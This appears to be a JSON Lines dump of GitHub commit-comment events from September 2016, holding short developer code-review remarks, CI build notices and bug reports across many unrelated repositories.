{"id":"4506159692","type":"CommitCommentEvent","actor":{"login":"Tuulaii"},"repo":{"name":"Tuulaii/hello-world"},"payload":{"comment":{"id":18873577,"position":null,"line":null,"path":null,"commit_id":"9f0fa038c6f236de7bb6dfd3229552b86385e5bc","created_at":"2016-09-02T01:57:16Z","updated_at":"2016-09-02T01:57:16Z","body":"uhh"}},"created_at":"2016-09-02T01:57:16Z"}
{"id":"4506161633","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"cs50/harvard.cs50.debug"},"payload":{"comment":{"id":18873580,"position":null,"line":null,"path":null,"commit_id":"f5dfdb881cf21f7c80853a67fcf0f2747cbd1223","created_at":"2016-09-02T01:57:59Z","updated_at":"2016-09-02T01:57:59Z","body":"Let me defer to @glennholloway's expertise on this one!"}},"created_at":"2016-09-02T01:57:59Z"}
{"id":"4506162788","type":"CommitCommentEvent","actor":{"login":"wysohn"},"repo":{"name":"wysohn/DungeonsXL"},"payload":{"comment":{"id":18873583,"position":19,"line":211,"path":"core/src/main/java/io/github/dre2n/dungeonsxl/player/DPermissions.java","commit_id":"ffa1cc116ca421ae960e8f6e3b4f3223a8b17d73","created_at":"2016-09-02T01:58:24Z","updated_at":"2016-09-02T01:58:24Z","body":"This throw IllegalArgumentException on /dxl reload"}},"created_at":"2016-09-02T01:58:24Z"}
{"id":"4507648496","type":"CommitCommentEvent","actor":{"login":"Hombre57"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":18877872,"position":4,"line":33,"path":"rtengine/color.h","commit_id":"d31de41f68cfcb9c3f5043987fdba0d882eed550","created_at":"2016-09-02T10:00:37Z","updated_at":"2016-09-02T10:00:37Z","body":"What are you referring to by \"visibility\" ? If you mouse over it, Eclipse show me the typedef line and then it's size. I just thought it would be less cumbersome to type with a typedef, and that would enforce the size of 7 element without thinking about it. Perhaps you mean direct visibility in the proto ?"}},"created_at":"2016-09-02T10:00:37Z"}
{"id":"4507653159","type":"CommitCommentEvent","actor":{"login":"yceballost"},"repo":{"name":"getflourish/Select-Below"},"payload":{"comment":{"id":18877882,"position":null,"line":null,"path":null,"commit_id":"d342dcf295ab9bd1f4fffff579b2f33e6a1e8504","created_at":"2016-09-02T10:01:41Z","updated_at":"2016-09-02T10:01:41Z","body":"Plugin doesn't works in Sketch v.39.1 (31720) :("}},"created_at":"2016-09-02T10:01:41Z"}
{"id":"4507653613","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"nareksayadyan/acans"},"payload":{"comment":{"id":18877884,"position":1,"line":4,"path":"src/address_book/User.java","commit_id":"8a9ddb387006707e59d3f1bbd44bc5227668ccd8","created_at":"2016-09-02T10:01:48Z","updated_at":"2016-09-02T10:01:48Z","body":"You need also keep address list and user id in User bean class."}},"created_at":"2016-09-02T10:01:48Z"}
{"id":"4507656558","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"mwvent/WattzMCPE-MyPlot"},"payload":{"comment":{"id":18877888,"position":null,"line":null,"path":null,"commit_id":"45de6433908cf9d50c62e7331e223d6dd940835d","created_at":"2016-09-02T10:02:30Z","updated_at":"2016-09-02T10:02:30Z","body":"Thank you.. was making me mad since several weeks"}},"created_at":"2016-09-02T10:02:30Z"}
{"id":"4507657150","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"mwvent/WattzMCPE-MyPlot"},"payload":{"comment":{"id":18877889,"position":null,"line":null,"path":null,"commit_id":"45de6433908cf9d50c62e7331e223d6dd940835d","created_at":"2016-09-02T10:02:38Z","updated_at":"2016-09-02T10:02:38Z","body":"Why?"}},"created_at":"2016-09-02T10:02:38Z"}
{"id":"4507658220","type":"CommitCommentEvent","actor":{"login":"zahramik"},"repo":{"name":"zahramik/webd"},"payload":{"comment":{"id":18877890,"position":null,"line":null,"path":null,"commit_id":"80e02f517bbe7be21f3175f03cf866d2909ec87c","created_at":"2016-09-02T10:02:53Z","updated_at":"2016-09-02T10:02:53Z","body":"alan inja hastam"}},"created_at":"2016-09-02T10:02:53Z"}
{"id":"4507658309","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":18877891,"position":4,"line":14,"path":"src/system/SearchModule/Container/LinkContainer.php","commit_id":"bb0cfa4022a6a433251e45d24d3a55dd8ad1f259","created_at":"2016-09-02T10:02:55Z","updated_at":"2016-09-02T10:02:55Z","body":"why is this needed?"}},"created_at":"2016-09-02T10:02:55Z"}
{"id":"4507664011","type":"CommitCommentEvent","actor":{"login":"mabrand"},"repo":{"name":"mxe/mxe"},"payload":{"comment":{"id":18877902,"position":null,"line":null,"path":null,"commit_id":"3d44ee628ff5cdd1aa91ef6bf0bff86ee1e69420","created_at":"2016-09-02T10:04:17Z","updated_at":"2016-09-02T10:04:17Z","body":"Sorry about that. I somehow overlooked that discussion. Shall I just remove the branch again?"}},"created_at":"2016-09-02T10:04:17Z"}
{"id":"4507664037","type":"CommitCommentEvent","actor":{"login":"brian0305"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18877903,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-02T10:04:18Z","updated_at":"2016-09-02T10:04:18Z","body":"R# :("}},"created_at":"2016-09-02T10:04:18Z"}
{"id":"4507668516","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"nareksayadyan/acans"},"payload":{"comment":{"id":18877913,"position":10,"line":74,"path":"src/address_book/Controller.java","commit_id":"b86737e7f6265f312b8542bc217510ea7823bd39","created_at":"2016-09-02T10:05:18Z","updated_at":"2016-09-02T10:05:18Z","body":"This method should be in repo layer"}},"created_at":"2016-09-02T10:05:18Z"}
{"id":"4507670166","type":"CommitCommentEvent","actor":{"login":"anuradha27"},"repo":{"name":"drishticone/2.0.0"},"payload":{"comment":{"id":18877917,"position":null,"line":null,"path":null,"commit_id":"041f23445df1e8eebed60ff44369c0308b538e41","created_at":"2016-09-02T10:05:40Z","updated_at":"2016-09-02T10:05:40Z","body":"ok sir"}},"created_at":"2016-09-02T10:05:40Z"}
{"id":"4507671319","type":"CommitCommentEvent","actor":{"login":"syphar"},"repo":{"name":"brouberol/contexttimer"},"payload":{"comment":{"id":18877920,"position":5,"line":82,"path":"contexttimer/__init__.py","commit_id":"4bf436818d00cba3fe04afad54fb290f88046fa9","created_at":"2016-09-02T10:05:55Z","updated_at":"2016-09-02T10:05:55Z","body":"thanks @codingjoe , just wanted to add the same fix :) "}},"created_at":"2016-09-02T10:05:55Z"}
{"id":"4507674268","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"nareksayadyan/acans"},"payload":{"comment":{"id":18877928,"position":5,"line":13,"path":"src/address_book/Controller.java","commit_id":"f524af254dd865a5eec0bd69f9397c4cfad011cb","created_at":"2016-09-02T10:06:35Z","updated_at":"2016-09-02T10:06:35Z","body":"badLogInCount should stay as a static memeber"}},"created_at":"2016-09-02T10:06:35Z"}
{"id":"4507675571","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"nareksayadyan/acans"},"payload":{"comment":{"id":18877930,"position":6,"line":14,"path":"src/address_book/Controller.java","commit_id":"f524af254dd865a5eec0bd69f9397c4cfad011cb","created_at":"2016-09-02T10:06:53Z","updated_at":"2016-09-02T10:06:53Z","body":"logedOnUsername should be static"}},"created_at":"2016-09-02T10:06:53Z"}
{"id":"4507677745","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"mwvent/WattzMCPE-MyPlot"},"payload":{"comment":{"id":18877932,"position":null,"line":null,"path":null,"commit_id":"45de6433908cf9d50c62e7331e223d6dd940835d","created_at":"2016-09-02T10:07:22Z","updated_at":"2016-09-02T10:07:22Z","body":"@Aericio said that in the group, segfaults on /p home, claim and more.\r\n@mwvent the mysqli provider will still work like before php7, right?"}},"created_at":"2016-09-02T10:07:22Z"}
{"id":"4507678980","type":"CommitCommentEvent","actor":{"login":"anotherjames"},"repo":{"name":"anotherjames/dotfiles"},"payload":{"comment":{"id":18877934,"position":5,"line":32,"path":"remove_before_the_dot.zshrc","commit_id":"5dbbf5b80a879a8922fc6ead4dd7738770e3c0ee","created_at":"2016-09-02T10:07:38Z","updated_at":"2016-09-02T10:07:38Z","body":"This sneaked into this commit, wasn't actually relevant to composer/xdebug..."}},"created_at":"2016-09-02T10:07:38Z"}
{"id":"4507679792","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18877936,"position":null,"line":null,"path":null,"commit_id":"d636ba88eaf126fe72d2cf4fd52b35a215a5951b","created_at":"2016-09-02T10:07:51Z","updated_at":"2016-09-02T10:07:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 901](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12344&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:17"}},"created_at":"2016-09-02T10:07:51Z"}
{"id":"4507680193","type":"CommitCommentEvent","actor":{"login":"anotherjames"},"repo":{"name":"anotherjames/dotfiles"},"payload":{"comment":{"id":18877937,"position":null,"line":null,"path":null,"commit_id":"5dbbf5b80a879a8922fc6ead4dd7738770e3c0ee","created_at":"2016-09-02T10:07:56Z","updated_at":"2016-09-02T10:07:56Z","body":"Note this requires zsh, but an equivalent could be made for bash."}},"created_at":"2016-09-02T10:07:56Z"}
{"id":"4507683011","type":"CommitCommentEvent","actor":{"login":"tokengeek"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18877940,"position":null,"line":null,"path":null,"commit_id":"d6dbe43af2aab0e371ea2eb57331da67f3f1ad34","created_at":"2016-09-02T10:08:35Z","updated_at":"2016-09-02T10:08:35Z","body":"@rbvermaa Thanks!"}},"created_at":"2016-09-02T10:08:35Z"}
{"id":"4507685518","type":"CommitCommentEvent","actor":{"login":"anotherjames"},"repo":{"name":"anotherjames/dotfiles"},"payload":{"comment":{"id":18877949,"position":null,"line":null,"path":null,"commit_id":"5dbbf5b80a879a8922fc6ead4dd7738770e3c0ee","created_at":"2016-09-02T10:09:12Z","updated_at":"2016-09-02T10:09:12Z","body":"Basically, this extracts all the settings from php.ini & other config files that your php normally runs under, aside from xdebug ones, pops them in a temporary file, then runs composer via a php command that specifies to use that config instead of the normal set, by replacing 'composer' with an alias that does all that. Although it does rely on your xdebug settings coming from a separate file to php.ini, which won't be the case on all set ups. "}},"created_at":"2016-09-02T10:09:12Z"}
{"id":"4507688134","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18877954,"position":null,"line":null,"path":null,"commit_id":"9ffbf8f3ed2c625b5759d2284ec280278f41614d","created_at":"2016-09-02T10:09:47Z","updated_at":"2016-09-02T10:09:47Z","body":"Existem linhas repetidas no Gemini settings. Verifica se tens que eliminar essas mesmas linhas no settings"}},"created_at":"2016-09-02T10:09:47Z"}
{"id":"4507688219","type":"CommitCommentEvent","actor":{"login":"dongreatul1"},"repo":{"name":"dongreatul1/hello-world"},"payload":{"comment":{"id":18877955,"position":null,"line":null,"path":null,"commit_id":"22a219141cbc24985a5fb67175d169bfe83f8a54","created_at":"2016-09-02T10:09:49Z","updated_at":"2016-09-02T10:09:49Z","body":"check by atul dongre"}},"created_at":"2016-09-02T10:09:49Z"}
{"id":"4507693591","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"nareksayadyan/acans"},"payload":{"comment":{"id":18877970,"position":34,"line":34,"path":"src/address_book/Controller.java","commit_id":"106e30911350fe058f7ad902878d8a7f917f620b","created_at":"2016-09-02T10:10:52Z","updated_at":"2016-09-02T10:10:52Z","body":"Your controller shouldn't have access to DB."}},"created_at":"2016-09-02T10:10:52Z"}
{"id":"4507694342","type":"CommitCommentEvent","actor":{"login":"winternet-studio"},"repo":{"name":"unsplash/unsplash-php"},"payload":{"comment":{"id":18877972,"position":null,"line":null,"path":null,"commit_id":"3288f6b151297c0232d71c6c4dfa712c298b3831","created_at":"2016-09-02T10:11:01Z","updated_at":"2016-09-02T10:11:01Z","body":"This would break existing code! Why wasn't the argument added in the end?"}},"created_at":"2016-09-02T10:11:01Z"}
{"id":"4507699104","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":18877989,"position":4,"line":14,"path":"src/system/SearchModule/Container/LinkContainer.php","commit_id":"bb0cfa4022a6a433251e45d24d3a55dd8ad1f259","created_at":"2016-09-02T10:11:59Z","updated_at":"2016-09-02T10:11:59Z","body":"See line 126. I only removed the backslash and replaced it by an import to make this more obvious/explicite."}},"created_at":"2016-09-02T10:11:59Z"}
{"id":"4507705872","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878008,"position":20,"line":20,"path":"src/gui/editorwidgets/qgskeyvaluewidget.cpp","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:13:31Z","updated_at":"2016-09-02T10:13:31Z","body":"Can you make this use the same standard as the rest of the initializer lists? (Eg one variable per line, start with commas)"}},"created_at":"2016-09-02T10:13:31Z"}
{"id":"4507713974","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18878026,"position":5,"line":20,"path":"src/haxeLanguageServer/features/CodeActionFeature.hx","commit_id":"f39f20df1e08260a49775c40d22a7e5ef0e98f69","created_at":"2016-09-02T10:15:29Z","updated_at":"2016-09-02T10:15:29Z","body":"Hm... I still don't like having `result` as a sort of \"out param\".. Do you think it's necessary to avoid additional array allocations?"}},"created_at":"2016-09-02T10:15:29Z"}
{"id":"4507716205","type":"CommitCommentEvent","actor":{"login":"Plancke"},"repo":{"name":"Plancke/hypixel-php"},"payload":{"comment":{"id":18878032,"position":null,"line":null,"path":null,"commit_id":"bd5804950d6812b3ca4a51af33f87f598b2bea3b","created_at":"2016-09-02T10:16:01Z","updated_at":"2016-09-02T10:16:01Z","body":"No it's not released yet, gametype id has been locked down though."}},"created_at":"2016-09-02T10:16:01Z"}
{"id":"4507716390","type":"CommitCommentEvent","actor":{"login":"wenqiang-tian"},"repo":{"name":"swoole/swoole-src"},"payload":{"comment":{"id":18878033,"position":null,"line":null,"path":null,"commit_id":"aafab8b7d24aa256d13b1326c06d7a55c02c7bf9","created_at":"2016-09-02T10:16:03Z","updated_at":"2016-09-02T10:16:03Z","body":"good"}},"created_at":"2016-09-02T10:16:03Z"}
{"id":"4507717183","type":"CommitCommentEvent","actor":{"login":"chathuranga"},"repo":{"name":"Zone24x7/redmine"},"payload":{"comment":{"id":18878034,"position":1,"line":1,"path":"app/controllers/account_controller.rb","commit_id":"30232609c729374c3520349ddd0ac903324048af","created_at":"2016-09-02T10:16:16Z","updated_at":"2016-09-02T10:16:16Z","body":"Ok. And BTW you can comment on gitlab rather than emailing separately.\n\n \n\nThanks,\n\nChathuranga\n\n \n\nFrom: Sanjeeva Reddy Maram [mailto:notifications@github.com] \nSent: Friday, September 2, 2016 2:51 PM\nTo: Zone24x7/redmine\nCc: Chathuranga Wijeratna; Comment\nSubject: Re: [Zone24x7/redmine] Modify the Email Subject Line (3023260)\n\n \n\nHi Chathuranga,\n\nThe deletion happened due to the following reason:\n\n1.\tIn past, I checked in the entire project code in GIT\n2.\tAfter sometime, I had a discussion with you regarding code checkin and you asked me to check in only the modified files.\n3.\tSo I deleted the Unmodifed/old files and checking in only modified files from then on.\n\nPlease let me know if there are any concerns.\n\nThanks,\nSanjeeva Reddy Maram.\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub <https://github.com/Zone24x7/redmine/commit/30232609c729374c3520349ddd0ac903324048af#commitcomment-18877434> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AAEWndQBZV4ssocHVNPg2JK-WgxSqrnsks5ql-qUgaJpZM4JzabU> .  <https://github.com/notifications/beacon/AAEWnVdf7tjMcX6tV2q17hovDoeQOOnBks5ql-qUgaJpZM4JzabU.gif> \n\n"}},"created_at":"2016-09-02T10:16:16Z"}
{"id":"4507717313","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/Project"},"payload":{"comment":{"id":18878035,"position":11,"line":11,"path":"src/Aplication.java","commit_id":"966282b9396789024f2c45ed1e1e712e18cba975","created_at":"2016-09-02T10:16:18Z","updated_at":"2016-09-02T10:16:18Z","body":"try use camelCase\r\nisonline -> isOnline"}},"created_at":"2016-09-02T10:16:18Z"}
{"id":"4507717749","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878036,"position":65,"line":65,"path":"src/gui/editorwidgets/qgskeyvaluewidget.cpp","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:16:23Z","updated_at":"2016-09-02T10:16:23Z","body":"We can't use auto yet - this should be Q_FOREACH for the short term future (Q_FOREACH is deprecated, but better than for here as for will detach). See https://www.kdab.com/goodbye-q_foreach/"}},"created_at":"2016-09-02T10:16:23Z"}
{"id":"4507719351","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/Project"},"payload":{"comment":{"id":18878037,"position":16,"line":16,"path":"src/Aplication.java","commit_id":"966282b9396789024f2c45ed1e1e712e18cba975","created_at":"2016-09-02T10:16:47Z","updated_at":"2016-09-02T10:16:47Z","body":"don't use underlines \r\nonline_user -> onlineUser"}},"created_at":"2016-09-02T10:16:47Z"}
{"id":"4507725953","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878047,"position":65,"line":65,"path":"src/gui/editorwidgets/qgskeyvaluewidget.cpp","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:18:21Z","updated_at":"2016-09-02T10:18:21Z","body":"Actually - no detach here (since map is const), but still don't think we can use auto on all our target platforms"}},"created_at":"2016-09-02T10:18:21Z"}
{"id":"4507727638","type":"CommitCommentEvent","actor":{"login":"jeffgodwyll"},"repo":{"name":"saviour123/myHoPoints"},"payload":{"comment":{"id":18878056,"position":13,"line":13,"path":"app.yaml","commit_id":"cd1b902d85aec60d69b261db0bf0ca12e06f1ed8","created_at":"2016-09-02T10:18:46Z","updated_at":"2016-09-02T10:18:46Z","body":"You don't have a `main` file in your project,  but you're referencing it here. It won't run.\r\n\r\nYou'll get an error complaining about that missing file or sth related to missing handler...etc"}},"created_at":"2016-09-02T10:18:46Z"}
{"id":"4507728001","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18878057,"position":5,"line":20,"path":"src/haxeLanguageServer/features/CodeActionFeature.hx","commit_id":"f39f20df1e08260a49775c40d22a7e5ef0e98f69","created_at":"2016-09-02T10:18:51Z","updated_at":"2016-09-02T10:18:51Z","body":"well, concat would probably be nicer, but i was obsessed with performance or something, i guess :)\r\nlet's leave it like that."}},"created_at":"2016-09-02T10:18:51Z"}
{"id":"4507728731","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18878061,"position":null,"line":null,"path":null,"commit_id":"6343494087ea7bbd9a152383a8bbc2fff280a2eb","created_at":"2016-09-02T10:19:01Z","updated_at":"2016-09-02T10:19:01Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/34843/testReport/) for this commit**"}},"created_at":"2016-09-02T10:19:01Z"}
{"id":"4507730180","type":"CommitCommentEvent","actor":{"login":"anotherjames"},"repo":{"name":"anotherjames/dotfiles"},"payload":{"comment":{"id":18878065,"position":1,"line":1,"path":"php_no_xdebug.sh","commit_id":"5dbbf5b80a879a8922fc6ead4dd7738770e3c0ee","created_at":"2016-09-02T10:19:20Z","updated_at":"2016-09-02T10:19:20Z","body":"Basically, this extracts all the settings from php.ini & other config files that your php normally runs under, aside from xdebug ones, pops them in a temporary file, then runs composer via a php command that specifies to use that config instead of the normal set, by replacing 'composer' with an alias that does all that. Although it does rely on your xdebug settings coming from a separate file to php.ini, which won't be the case on all set ups."}},"created_at":"2016-09-02T10:19:20Z"}
{"id":"4507730204","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/Project"},"payload":{"comment":{"id":18878066,"position":17,"line":17,"path":"src/Aplication.java","commit_id":"966282b9396789024f2c45ed1e1e712e18cba975","created_at":"2016-09-02T10:19:20Z","updated_at":"2016-09-02T10:19:20Z","body":"Your save() method should be on repository class layer. Your Controller shouldn't know about where to write data how to write. Your controller should do repo method call like userRepo.addUser(user)"}},"created_at":"2016-09-02T10:19:20Z"}
{"id":"4507733011","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878071,"position":61,"line":61,"path":"src/gui/editorwidgets/qgskeyvaluewidget.h","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:20:02Z","updated_at":"2016-09-02T10:20:02Z","body":"In before @m-kuhn asks for use of Q_PROPERTY for map/setMap here ;)"}},"created_at":"2016-09-02T10:20:02Z"}
{"id":"4507735208","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/Project"},"payload":{"comment":{"id":18878077,"position":10,"line":10,"path":"src/User.java","commit_id":"966282b9396789024f2c45ed1e1e712e18cba975","created_at":"2016-09-02T10:20:34Z","updated_at":"2016-09-02T10:20:34Z","body":"`List<String> numberlist; -> List<PhoneAddress> numberlist;`"}},"created_at":"2016-09-02T10:20:34Z"}
{"id":"4507737919","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/Project"},"payload":{"comment":{"id":18878082,"position":55,"line":55,"path":"src/User.java","commit_id":"966282b9396789024f2c45ed1e1e712e18cba975","created_at":"2016-09-02T10:21:14Z","updated_at":"2016-09-02T10:21:14Z","body":"otheruser -> otherUser"}},"created_at":"2016-09-02T10:21:14Z"}
{"id":"4507742690","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/Project"},"payload":{"comment":{"id":18878094,"position":null,"line":null,"path":null,"commit_id":"966282b9396789024f2c45ed1e1e712e18cba975","created_at":"2016-09-02T10:22:23Z","updated_at":"2016-09-02T10:22:23Z","body":"You should keep your layer structure. Now it's wrong. Your controller shouldn't save data to file it should done by repository."}},"created_at":"2016-09-02T10:22:23Z"}
{"id":"4507744369","type":"CommitCommentEvent","actor":{"login":"tonytheodore"},"repo":{"name":"mxe/mxe"},"payload":{"comment":{"id":18878097,"position":null,"line":null,"path":null,"commit_id":"3d44ee628ff5cdd1aa91ef6bf0bff86ee1e69420","created_at":"2016-09-02T10:22:46Z","updated_at":"2016-09-02T10:22:46Z","body":"Yes, thanks. The branch is harmless and can be removed (along with any `.git/config`), just a little confusing in `git hist`."}},"created_at":"2016-09-02T10:22:46Z"}
{"id":"4507745093","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"Starcounter/starcounter-layout-html-editor"},"payload":{"comment":{"id":18878100,"position":41,"line":130,"path":"starcounter-layout-html-editor.html","commit_id":"11d110f065c0db1b2a509cd0d1eaa63ffcff8e37","created_at":"2016-09-02T10:22:56Z","updated_at":"2016-09-02T10:22:56Z","body":"No particular reason. Please switch to whatever you think suits better."}},"created_at":"2016-09-02T10:22:56Z"}
{"id":"4507752192","type":"CommitCommentEvent","actor":{"login":"jus61"},"repo":{"name":"MajorXAcE/PTWS"},"payload":{"comment":{"id":18878116,"position":null,"line":null,"path":null,"commit_id":"4d7caab310e78ad0c8a74b1063493440fe831191","created_at":"2016-09-02T10:24:44Z","updated_at":"2016-09-02T10:24:44Z","body":"``11:22:59 \"PTWS - Loading Config\"\r\n11:22:59 \"PTWS - Initialized\"\r\n11:22:59 Error in expression <aseID \" , \" _insertDatabaseID \" ];\r\nwenn ( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error position: <( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error Missing ;\r\n11:22:59 File PTWS\\scripts\\insertPTWS.sqf, line 2\r\n11:22:59 Error in expression <aseID \" , \" _insertDatabaseID \" ];\r\nwenn ( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error position: <( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error Missing ;\r\n11:22:59 File PTWS\\scripts\\insertPTWS.sqf, line 2\r\n11:22:59 Error in expression <aseID \" , \" _insertDatabaseID \" ];\r\nwenn ( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error position: <( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error Missing ;\r\n11:22:59 File PTWS\\scripts\\insertPTWS.sqf, line 2\r\n11:22:59 Error in expression <aseID \" , \" _insertDatabaseID \" ];\r\nwenn ( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error position: <( ! IsServer ) exitWith {};\r\n \r\n_checkDatab>\r\n11:22:59   Error Missing ;\r\n11:22:59 File PTWS\\scripts\\insertPTWS.sqf, line 2\r\n11:23:00 Error in expression <#line 1 \"PTWS\\scripts\\insertPTWS.sqf\"\r\nPrivate [ \" _checkDatabaseID \" , \" _inse>\r\n11:23:00   Error position: <Private [ \" _checkDatabaseID \" , \" _inse>\r\n11:23:00   Error Local variable in global space\r\n11:23:00 File PTWS\\scripts\\insertPTWS.sqf, line 1\r\n11:23:01 \"PTWS - Loading last saved date : [2016,8,26,17,17]\"\r\n11:23:01 \"PTWS - Loading last saved weather : [0.317556,0,[0,0,0],[1.41253,-1.80514,false],0.22229,0.1,0]\"\r\n11:23:01 Weather was forced to change\r\n11:23:01 \"PTWS - SaveDate Initialized\""}},"created_at":"2016-09-02T10:24:44Z"}
{"id":"4507757295","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878127,"position":1,"line":1,"path":".idea/uiDesigner.xml","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:26:01Z","updated_at":"2016-09-02T10:26:01Z","body":"Please don't commit files inside .idea folder. I don't need that files"}},"created_at":"2016-09-02T10:26:01Z"}
{"id":"4507762003","type":"CommitCommentEvent","actor":{"login":"pieman64"},"repo":{"name":"pieman64/SmartBlynkie-ioT-Game"},"payload":{"comment":{"id":18878136,"position":5,"line":5,"path":"README.md","commit_id":"4521077defdee43b52052eba68ba7b135d39fd9d","created_at":"2016-09-02T10:27:13Z","updated_at":"2016-09-02T10:27:13Z","body":"[![SmartBlynkie™© ioT Game](https://cloud.githubusercontent.com/assets/8315296/18200908/e7ffe0ba-710f-11e6-99fa-9b031fa80c96.png)](https://youtu.be/RBnHyGzlykE?t=23s \"SmartBlynkie™© ioT Game\")"}},"created_at":"2016-09-02T10:27:13Z"}
{"id":"4507763799","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18878139,"position":null,"line":null,"path":null,"commit_id":"10f6f2964b6649551b35e4ed0f01b90c12d71f30","created_at":"2016-09-02T10:27:39Z","updated_at":"2016-09-02T10:27:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 902](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12355&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T10:27:39Z"}
{"id":"4507764626","type":"CommitCommentEvent","actor":{"login":"patriksvensson"},"repo":{"name":"cake-build/cake"},"payload":{"comment":{"id":18878142,"position":6,"line":null,"path":"src/Cake.Common/Tools/MSBuild/MSBuildLogger.cs","commit_id":"3484db41cf037585821b4b6a3a99c2ab29e6c57d","created_at":"2016-09-02T10:27:52Z","updated_at":"2016-09-02T10:27:52Z","body":"Can we seal the class?"}},"created_at":"2016-09-02T10:27:52Z"}
{"id":"4507764970","type":"CommitCommentEvent","actor":{"login":"ImanGit"},"repo":{"name":"ImanGit/Advertise"},"payload":{"comment":{"id":18878143,"position":null,"line":null,"path":null,"commit_id":"3c8b0ec6f122a39469b21e83ef8b71158903c72a","created_at":"2016-09-02T10:27:57Z","updated_at":"2016-09-02T10:27:57Z","body":"عالی بود دستت درد نکنه"}},"created_at":"2016-09-02T10:27:57Z"}
{"id":"4507765568","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SusAghlamazyan/ACA"},"payload":{"comment":{"id":18878145,"position":18,"line":18,"path":"Homework9Modified/src/Controller.java","commit_id":"01760431d39d9d495ebd1e1034f33b7d5bc4ab92","created_at":"2016-09-02T10:28:06Z","updated_at":"2016-09-02T10:28:06Z","body":"You shouldn't keep user list here. You should use your db (file) for read/write users"}},"created_at":"2016-09-02T10:28:06Z"}
